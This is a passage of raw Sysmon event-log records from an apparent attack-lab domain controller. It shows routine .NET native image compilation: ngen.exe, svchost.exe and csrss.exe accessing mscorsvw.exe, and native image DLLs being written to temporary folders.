13:25:54.729{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4662-6000-3A04-000000009A01}228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:54.572{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4662-6000-3904-000000009A01}1828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:54.557{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4662-6000-3904-000000009A01}1828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:54.557{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4662-6000-3904-000000009A01}1828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:54.479{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4662-6000-3804-000000009A01}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:54.432{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4662-6000-3804-000000009A01}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:54.432{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4662-6000-3804-000000009A01}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:54.166{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4662-6000-3704-000000009A01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:54.150{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4662-6000-3704-000000009A01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:54.150{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4662-6000-3704-000000009A01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:54.088{08A6967A-4661-6000-3604-000000009A01}3144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c48-0\SMDiagnostics.dll2021-01-14 13:25:54.088 10341000x80000000000000008347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:57.916{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4665-6000-3C04-000000009A01}4988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:57.901{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4665-6000-3C04-000000009A01}4988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:57.901{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4665-6000-3C04-000000009A01}4988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:57.588{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4665-6000-3B04-000000009A01}912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:57.572{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4665-6000-3B04-000000009A01}912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:57.572{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4665-6000-3B04-000000009A01}912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:57.369{08A6967A-4662-6000-3A04-000000009A01}228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e4-0\System.Activities.dll2021-01-14 13:25:57.369 10341000x80000000000000008361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:59.979{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4667-6000-4004-000000009A01}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:59.963{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4667-6000-4004-000000009A01}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:59.963{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4667-6000-4004-000000009A01}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:59.760{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4667-6000-3F04-000000009A01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:59.729{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4667-6000-3F04-000000009A01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:59.729{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4667-6000-3F04-000000009A01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:59.666{08A6967A-4667-6000-3E04-000000009A01}4200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1068-0\System.Activities.DurableInstancing.dll2021-01-14 13:25:59.666 10341000x80000000000000008354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 